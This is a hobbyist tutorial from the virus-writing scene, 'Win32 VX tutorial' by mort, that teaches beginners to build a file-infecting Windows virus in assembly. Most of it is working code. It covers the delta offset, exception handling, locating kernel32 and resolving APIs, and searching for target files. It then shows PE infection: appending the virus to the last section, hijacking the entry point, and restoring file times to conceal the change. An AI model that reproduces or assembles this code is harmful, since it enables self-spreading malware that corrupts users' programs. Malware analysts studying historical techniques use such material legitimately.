Win32 VX tutorial
by mort [MATRiX]

This article is for educational purpose only and I AM NOT responsibille for anything nor my english, nor myself,...anyway, enjoy it...

( forewords )

Well, forewords,... i have no fucking idea what to write into this part. Anyway, this will be article for absolute lamie who wants to teach write a win32 virii. When i wanted to write my first virii (not so long ago) i'd like to have something like this (hehe, i had LordJulus one, anyway i wanna to write my own :)). You, the reader, are assumed to know some of assembler coding (TASM forever:)).


    1. delta handle
    2. SEH
    3. kernell base
    4. APIs
    5. search files
    6. infect files
    7. closing
    8. appendix - MZ and PE structure

( here we go - I. delta handle )

Let see what is happened with infected file when is executed. Mostly the first executed if not using EPO (see my EPO article) is the virus code. First the virus has to do (if not using some strange method) is getting the delta handle. Delta handle is numeric value which helps u access the variables and other stuff in virus body. The easiest way to explain is this code:

       call @delta
       pop ebp               ;ebp contains address of  @delta right now in
       sub ebp,offset @delta ;memory -> we must sub the linking @delta val

To access variables use this code:

       mov eax,[ebp + offset _variable]  ;get value of variable
       lea eax,[ebp + offset _variable]  ;get offset of variable

Sure, u can use other registers to carry delta handle, but other register are more helpfull in coding then ebp.

( II. SEH )

SEH stands for Structured Exception Handler and is use for avoiding BSOD (blue screen of death :) which appears if there is happen some exception. Most usuall way to create exception is write to some read-only part of memory.

 SEH  consist of two dwords. First points to  'old SEH' the second to 'new
 SEH'. When host is loaded fs:[0] points to SEH. See the code:

       push dword ptr fs:[0]      ;save new, now 'old SEH' to stack
       call @SEH                  ;save new 'new SEH' to stack

       mov esp,[esp + 8]          ;load old stack              
       pop eax                    ;clear stack
       pop dword ptr fs:[0]       ;restore old SEH

       jmp @whereEverUWant        ;if we're here -> something bad occured
                                  ;better to leave back to host,...

       ;now we have two dwords saved on stack - new and old SEH
       mov dword ptr fs:[0],esp   ;set new SEH 
       ;from this part we can safely write everywhere
       ;if exception occurs code will jump to @newSEH label

I have no idea how SEH is working inside, anyway this is all we need to know,...:)

( III. kernell base )

Windows kernell is connected to win32 subsystem which offers to us APIs. In win NT there's also POSIX and OS/2 subsytem, but thats not we are interested in. Win32 is the basic subsytem for windows. APIs are access- able via DLLs mapped on process's address space. The most usefull DLL for virii is kernell32.dll (next only kernell). To get APIs' address from this DLL we must found its base - address in memory it starts on. There are two ways i know to get kernell base.(well i know third, get base with the help of import in infected host,...check Lord Julus's article).

The first one is using the stack value right after host executing. This value is supposed to b from some part of kernell. So by this, we retrieve some address from kernell - we dont know where it is. Let see the things we know:

See the code:

       mov eax,[esp]              ;get stack 'kernell' value
       and eax,0fffff000h         ;set it to align value
       mov ecx,050h               ;page numbers,...-1 could be good too
       cmp word ptr [eax],'ZM'    ;check if we found kernell MZ header
       jz @mayBe

       sub eax,01000h             ;sub one page from 'base locator'
       dec ecx                    ;decrease page counter
       jnz @loopie
       jmp @fakinWedr             ;no kernell - no virii

       xchg eax,ebx               ;save kernell base
       add eax,[eax + 03ch]       ;get PE address from MZ header
       cmp word ptr [eax],'EP'    ;check if PE header
       xchg eax,ebx
       jnz @eou

       ;if our code will come here there is kernell base in eax

The second way do not use "stack kernel value", but using SEH to check the base. There're some version of windows -> there're some versions kernell bases. If we have some bases we can use them all to check if it's kernell base.

See the code (fragments of

          cld                                       ;set direction
          lea esi,[ebp + offset _kernells - @delta] ;offset of kernnels

          lodsd                ;load base to check
          push esi             ;save kernells offset location
          inc eax              ;check if we checked the last base
          jz @bad              ;yea -> no kernell base found

          push ebp             ;save delta handle
          call @kernellSEH     ;standard SEH call :)
          mov esp,[esp + 08h]  ;restore stack
          pop dword ptr fs:[0] ;restore old SEH
          pop eax              ;clear stack
          pop ebp              ;get back delta handle
          pop esi              ;get pointer to next kernell base
          jmp @nextKernell     ;go to check next kernell base

          pop eax              ;we failed,...
          jmp @returnHost
  ;the most common kernell bases
  _kernells           label
                    dd 077e80000h - 1   ;NT 5
                    dd 0bff70000h - 1   ;w9x
                    dd 077f00000h - 1   ;NT 4
                    dd -1
          push dword ptr fs:[0]         ;setup new SEH
          mov dword ptr fs:[0],esp
          mov ebx,eax                   ;save base
          xchg eax,esi     
          xor eax,eax
          lodsw                         ;read 1st word from base
          not eax                       ;check if it's MZ - start of EXE
          cmp eax,not 'ZM'          
          jnz @bad1                     ;nope -> try next base
          mov eax,[esi + 03ch]          ;we found MZ-> check PE header
          add eax,ebx                   ;in eax is relative - add base
          xchg eax,esi                  
          lodsd                         ;read 1st dword from PE
          not eax
          cmp eax,not 'EP'        ;check if PE -> found PE -> found kernell
          jnz @bad1
          pop dword ptr fs:[0]    ;set old SEH
          pop eax ebp esi         ;clear stack
          ;ebx - kernel base, ebp - delta handle

We neednt check kernell base by checking MZ and PE header. There's other way. Assume we have base in eax: (see PE structure)

          cmp eax,[eax + 0b4h]
          jnz @fuck
          cmp eax,[eax + 0104h]         ;base stored in win2000 kernell
          jnz @fuck

We have kernell base -> we can search APIs,...

( IV. APIs )

API stands for Application Programming Interface. It's set of functions we can use. APIs are accessable by case sensitive names. Due to writing normal program, we can use APIs by normal way - not in virus. In virii we must search for APIs in DLLs (DLL stands for dynamic-link library.) which export this APIs. Most usefull APIs for virus work is in kernell32.dll ( we have its base from III.part ). There are DLLs like GDI32.dll and such with other APIs, anyway kernell APIs are the basic. To find API adsresses we must know some of DLL structure.

win32 EXE and DLL file structure

(see appendix A for full MZ and PE record)

 - start of file -
 0        db 'MZ'             mark of DOS executable
 03ch     dd ?                relative address of PE header in file
 0        db 'PE',0,0         mark of PE header
 078h     dd ?                export section relative address

By the export section address we'll get into export section. All u need to know:

 - start of the export section -
 018h     dd ?      number of names               1)
 01ch     dd ?      address of functions          2)
 020h     dd ?      address of names              3)
 024h     dd ?      address of odinals            4)
 ad 1) number of names of APIs exported by DLL
 ad 2) pointer to array of pointers to APIs addresses
 ad 3) pointer to array of pointers to APIs' names
 ad 4) pointer to array of pointers to APIs' ordinals

Each API has a name and an ordinal number by which we will check the address. Well, lets go search API step by step. Imagine we wanna find API address for UncleFuckerAPI. We search for 'UncleFuckerAPI' string in array of API names and must save the index of API in search. We'll use this index to get the ordinal number -> via it we'll get the API address.

 - array of names' pointers
   0      1          x
 [ dd ] [ dd ] ... [ dd ]
   |                 |
   |                 '-> 'UncleFuckerAPI'
   '-> 'AddAtomA'
 - array of ordinals
      x*2 -------->--.
  [ dw ] [ dw ] ... [ dw ]
                        '---> y
 - array of addresses
      y*4 -----------.
  [ dd ] [ dd ] ... [ dd ]
                        '---> UncleFuckerAPI address

Now, the whole code for search all APIs we need:

     ;eax and ebx contains kernell base
     add eax,[eax + 03ch]     ;get PE of kernell
     mov eax,[eax + 078h]     ;get export section relative
     add eax,ebx              ;get export section address
     add eax,018h             ;move to number of names
     xchg eax,esi
     push _APIcount           ;push number of API we want
     lodsd          ;load number of API names
     push eax       ;save it to stack
     inc eax        ;value we will decrement t get index of name
     push eax       ;save it to stack
     lodsd          ;load pointer to API adresses
     push eax       ;save it to stack
     lodsd          ;load pointer to names' addresses
     push eax       ;save it to stack
     lodsd          ;load pointer to ordinals' adresses
     push eax       ;save it to stack
     mov eax,[esp + 4]        ;get names array relative
     add eax,ebx              ; '-> get right address
     xchg eax,esi             

     dec dword ptr [esp + 0ch]
     lodsd          ;get name's relative
     add eax,ebx    ; '-> get right address

     ;we have pointer to API name and we must recognize if this is API
     ;we need -> there're many ways of checking this,...find your own
     ;eg. check the names,...see appendix
     mov eax,[esp + 010h]     ;get number of exported names
     sub eax,[esp + 0ch]      ;decremented number -> eax holds the index
     shl eax,1                ;x*2 -> eax
     add eax,[esp]            ;get ordinal possition (relative)
     add eax,ebx              ;'-> get right address
     push esi                 ;save names' pointer possition
     xchg eax,esi             
     xor eax,eax              
     lodsw                    ;load word ordinal value to eax (y)
     shl eax,2                ;y*4 -> eax
     add eax,[esp + 0ch]      ;get address possition (relative)
     add eax,ebx              ;'-> get right address
     xchg eax,esi
     lodsd                    ;load address of API (relative)
     add eax,ebx              ;'-> get right address
     ;we have API address in eax -> save it anywhere u want for later use
     pop esi                    ;restore names' pointer
     dec dword ptr [esp + 014h] ;decrement out API counter
     jnz @nextAPI
     add esp,018h               ;clear stack

     ;here, we have all APIs we need

The last i can mention is calling the API. Imagine we have and named array of APIs' addresses:

        _xAPI                 dd ?
        _UncleFuckerAPI       dd ?
        push parameter1                 ;store parameters to stack
        push parameter1
        push parameterX
        call [ebp + _UncleFuckerAPI]    ;call API

( appendix )

It's obvious that to check if the API name we have is the one we need we need a name of this API in our virii to compare. Thats the one way: carry API names of APIs we need and compare them with the name. Another way is, we neednt hold long names of API, we can carry only their CRCs -> we need some function that count value for each API we need. This value must be unific. Have this we count the value of checked name and compare it with our value -> if pass, we have our API.

PS last comment to APIs' names - they are store in alphabetical order

( V. search files )

If u're writing virii, u'r going to infect some files. To work with file we need it's full path. There several ways to get it. The most common is search via FindFirstFileA (FFF) and FindNextFileA API (FNF). FFF finds the first file in current directory and returns the handle of search. FNF search for next files in current directory and needs the handle of search from FFF like parameter.

  push offset File Search structure
  push file mask to find
  call FindFirstFile
  returns hadnle of search
  push offset File Search structure
  push handle given from FindFirstFileA call
  call FindNextFileA
  returns 1 if succed, 0 if fail
 File Search structure
  max_path equ 260                                  
  filetime                       struc
         FT_dwLowDateTime        dd ?
         FT_dwHighDateTime       dd ?
  filetime                       ends
  fileSearc                      struc
         FileAttributes          dd ?
         CreationTime            filetime ?        
         LastAccessTime          filetime ?        
         LastWriteTime           filetime ?        
         FileSizeHigh            dd ?
         FileSizeLow             dd ?
         Reserved0               dd ?
         Reserved1               dd ?
         FileName                db max_path dup(?)
         AlternateFileName       db 13 dup(?)     
                                 DB 3 DUP (?)      
  fileSearch                      ends

I think parameters are clear. After succesfull calling FFF or FNF this structure will be filled with data about founded file.

If we no longer need the handle returned from FFF it's better to close it via FindClose API.

  push search handle
  call FindClose

FFF and FNF search for files in current directory. There're APIs to get and set current directory - Get(Set)CurrentDirectoryA.

  push offset of buffer to store the current path
  push size of buffer to fill
  call GetCurrentDirectoryA
  returns lenght of returned string.
  push offset of path to set
  call SetCurrentDirectoryA
  returns: if succed the return value is nonzero

There're APIs to get the some system directories: GetWindowsDirectoryA and GetSystemDirectoryA

  push size of buffer to fill
  push offset of buffer to store the windows path
  call GetWindowsDirectoryA
  push size of buffer to fill
  push offset of buffer to store the system path
  call SystemDirectoryA

This APIs returns lenght of returned string.

Thats the basic informations u need to write some search routine. Sure there're more APIs deal with file searching. See SDK reference for them i wont waste the space with them,..All for file searching.

( VI. infect files )

Well, file infecting,... to infect file we need some APIs to deal with. Windows use way of working with file called file mapping. It means that file is mapped on some address in proces' address space. If u change some byte in this address space, u change the byte in file. I described file mapping in my IPC article, so i wont describe it again. Go and read it,.. and assume that we have base address the file to infect is loaded on.

But first some words bout PE windows PE EXE structure. Windows code is divorced to sections - section for code, for (un)initialized data, for debug informations,... and so on. Each section has a header. Headers of sections are stored behind the PE header. We can add new section with our virri, or(more usuall) we can enlarge the last section and copy virii into it, and change entrypoint to point to our code. Well, there exist many ways of PE infecting, anyway, this is the best for understand. Well, lets go step by step. First we need to check if loaded file is PE executable one:

 /|MZ header                  |   
|E|PE header                  |  
| |---------------------------|  
|e|CODE section header        |  
|x|...                        |  
|e|DATA section header        |  
|c|...                        |  
|u|unclefucker section header |  eax - mapped file address
|t|...                        |  
|a|---------------------------|         mov edi,eax
|b|CODE data                  |         mov eax,'MZZM'
|l|...                        |         cmp ax,word ptr [edi]
|e|---------------------------|         jz @foundMZ
 \|DATA data :)               |         shr eax,010h
  |...                        |         cmp ax,word ptr [edi]
  |---------------------------|         jnz @notMZ
  |unclefucker data           |
  |...                        |  @foundMZ:

I check the DOS header for MZ and ZM. To say the truth i never saw 'ZM' string in DOS header, but i read somewhere it can be used,... Get PE header:

          mov eax,[edi + 3ch]           ;get PE relative
          add eax,edi                   ;and right address
          xchg esi,eax
          lodsd                         ;load PE sign
          not eax
          cmp eax,not 'EP'              ;check PE sign
          jnz @notPE                    ;leave if not PE

Now we have PE pointer. It's good to save some values from PE header for later use. Sections and whole file are aligned to some values. It's section align and file align value from PE header.

          sub esi,4                     ;get PE address
          mov ebx,edi                   ;ebx -> file base

          mov eax,[esi + 038h]          ;get section align value
          mov [ebp + _secAlign],eax     ;and save it
          mov eax,[esi + 03ch]          ;get file align value
          mov [ebp + _fileAlign],eax    ;and save it
          mov eax,[esi + 074h]          ;get dir. number (see PE header)
          shl eax,3                     ;8 bytes for each record
          push eax                      ;and save it
          xor eax,eax
          mov ax,[esi + 06h]            ;load number of sections
          mov ecx,028h                  ;28 bytes for each section header
          dec eax                       ;seeking for last,...
          mul ecx                       ;and mul it
          pop edi                       ;load dir size
          add edi,eax                   ;add headers - 1 size
          add edi,esi                   ;add PE offset
          add edi,078h                  ;add PE size

Now edi points to last section header. It's the time to show header structure:

   0       db 8 dup(?)         ;name of header eg. 'text' for code
   8       dd ?                ;virtual size
   0ch     dd ?                ;virtual RVA
   010h    dd ?                ;physical size
   014h    dd ?                ;physical offset
           dd ?,?,?
   024h    dd ?                ;sections flags

Virtual RVA and size values are used when the process is loaded in mem. or physical use(data stored on disk) is used physical size and offset.

  _newFileSize      = infect file size before infection,...
  _vSize            = virus size

          xor edx,edx
          mov eax,[edi + 010h]          ;get physical size of last section
          add eax,_vSize                ;add our virri to it
          mov ecx,[ebp + _fileAlign]    ;use file align to align it
          div ecx                       ;div it
          inc eax                       ;inc it to be align
          mul ecx                       ;and mul it
          sub eax,[edi + 010h]          ;get aligned delta
          add [esi + 050h],eax          ;and increase image size
          add [ebp + _newFileSize],eax  ;add aligned size
          mov edx,[edi + 010h]          ;save old physical size
          add [edi + 010h],eax          ;and set new one

          or dword ptr [edi + 024h],0a0000020h ;set flags - see later
          mov eax,[edi + 0ch]           ;get physical offset
          add eax,edx                   ;and get our copy address

          xchg [esi + 028h],eax         ;set/get new/old entrypoint
          add eax,[esi + 034h]          ;add imagebase to get entryaddress
          mov dword ptr [ebp + _hostIP],eax       ;save old one

          push edx
          xor edx,edx
          mov eax,[edi + 08h]           ;get virtual size
          mov ecx,[ebp + _secAlign]     ;use section align to align it
          div ecx                       ;and dic it
          inc eax                       ;inc it to be align
          mul ecx                       ;and mul it,...:)
          mov [edi + 08h],eax           ;set new virtual size

          pop edx
          mov eax,[edi + 014h]          ;get physical offset
          add eax,edx                   ;add physical size
          add eax,ebx                   ;add file base
          xchg eax,edi                  

          lea esi,[ebp + @virusStart]   ;get our virus entry
          mov ecx,_vSize                ;virus size
          rep movsb                     ;and copy it to host

About the falgs,... each section has a flag's dword. It set the section read,write,read/write,...we must set last section writeable, coz we write into :),... we must or it with flags u see in code,...:)

Infection is nearly done. Now we must set new file size stored in _newFileSize variable. We set file pointer to end of file by calling SetEndOfFile and set end of file by same-naming API.

          push 0 0                      ;not important, but needed,...:)
          push dword ptr [ebp + _newFileSize]     ;new file size,...
          push dword ptr [ebp + _fileHandle]      ;handle given from
          call SetFilePointer                     ;CreateFileA API

          push dword ptr [ebp + _fileHandle]      ;file handle -//-
          call SetEndOfFile

Next thing u r expect to do is set old time of file change. It's stored in file search structure. We do it by calling SetFileTime API.

          lea eax,[ebp + _fileSearch.CreationTime]
          push eax                                ;CreationTime
          add eax,8
          push eax                                ;LastAccessTime
          add eax,8
          push eax                                ;LastWriteTime
          push dword ptr [ebp + _fileHandle]      ;file handle
          call SetFileTime

It may occurs that file will be have an readable attribut. We can set normal attribut before mapping the file by SetFileAttributeA. After work is done we set old attribute which is stored in file search structure.

         / 020h     ;normal attribute
  push -|
         \ dword ptr [ebp + _fileSearch.FileAttributes] ;old attribute
          lea eax,[ebp + _fileSearch.FileName]
          push eax
          call SetFileAttributes

And thats all for infecting,...

( VII. closing )

Closing,... hm, if u get here, you might read the article and it might helps u, i hope there's not so many mistakes i thing,...:) Please feel free to write me any comments or ideas...


   | |.--.   -|-.
   | ||  |.--|| |
   |  \  m o r|t .

( appendix )

(this info is not my source, not responsibile for bad info,...)

 MZ record
   0                dw 'ZM'             ;MZ identificator
   2                dw ?                ;last page bytes
   4                dw ?                ;file pages
   6                dw ?                ;reloc
   8                dw ?                ;header size in paragraphs
   0ah              dw ?                ;minimum paragraph needed
   0ch              dw ?                ;maximum paragraphs needed
   0eh              dw ?                ;initial SS
   010h             dw ?                ;initial SP
   012h             dw ?                ;checksum
   014h             dw ?                ;initial IP
   016h             dw ?                ;initial CS   
   018h             dw ?                ;reloc address
   01ah             dw ?                ;overlay number
   01ch             dd ?                ;reserved
   020h             dw ?                ;OEM dentifier
   022h             dw ?                ;OEM information
          ....                          ;reserved
   03ch             dw ?                ;PE header relative offset

 PE record
  0                 dd 'EP'             ;PE indentificator
  4                 dw ?                ;CPU type
  6                 dw ?                ;number of sections
  8                 dd ?                ;date time
  0ch               dd ?                ;COFF pointer
  010h              dd ?                ;COFF size
  014h              dw ?                ;NT header size
  016h              dw ?                ;PE flags
 nt header
  018h              dw ?                ;NT header ID
  01ah              db ?                ;linker major number
  01bh              db ?                ;linker minor number
  01ch              dd ?                ;code size
  020h              dd ?                ;idata size
  024h              dd ?                ;udata size
  028h              dd ?                ;entrypoint RVA
  02ch              dd ?                ;code base
  030h              dd ?                ;data base
  034h              dd ?                ;image base
  038h              dd ?                ;sections align
  03ch              dd ?                ;file align
  040h              dw ?                ;OS major number
  042h              dw ?                ;OS minor number
  044h              dw ?                ;user major
  046h              dw ?                ;user minor
  048h              dw ?                ;subsys major
  04ah              dw ?                ;subsys minor
  04ch              dd ?                ;reserved
  050h              dd ?                ;image size
  054h              dd ?                ;header size
  058h              dd ?                ;checksum
  05ch              dw ?                ;subsystem
  05eh              dw ?                ;DLL flags
  060h              dd ?                ;stack reserve
  064h              dd ?                ;stack commit
  068h              dd ?                ;heap reserve
  06ch              dd ?                ;heap commit
  070h              dd ?                ;loader flags
  074h              dd ?                ;number of RVA sizes

  078h              dd ?                ;export RVA
  07ch              dd ?                ;export size
  080h              dd ?                ;import RVA
  084h              dd ?                ;import size
  088h              dd ?                ;resource RVA
  08ch              dd ?                ;resource size
  090h              dd ?                ;exception RVA
  094h              dd ?                ;exception size
  098h              dd ?                ;security RVA
  09ch              dd ?                ;security size
  0a0h              dd ?                ;fixup RVA
  0a4h              dd ?                ;fixup size
  0a8h              dd ?                ;debug RVA
  0ach              dd ?                ;debug size
  0b0h              dd ?                ;description RVA
  0b4h              dd ?                ;description size
  0b8h              dd ?                ;machine RVA
  0bch              dd ?                ;machine size
  0c0h              dd ?                ;tls RVA
  0c4h              dd ?                ;tls size
  0c8h              dd ?                ;loadconfig RVA
  0cch              dd ?                ;loadconfig size
                    dd ?,?              ;hm? :)
  0d8h              dd ?                ;iat RVA
  0dch              dd ?                ;iat size
                    dd ?,?
                    dd ?,?
                    dd ?,?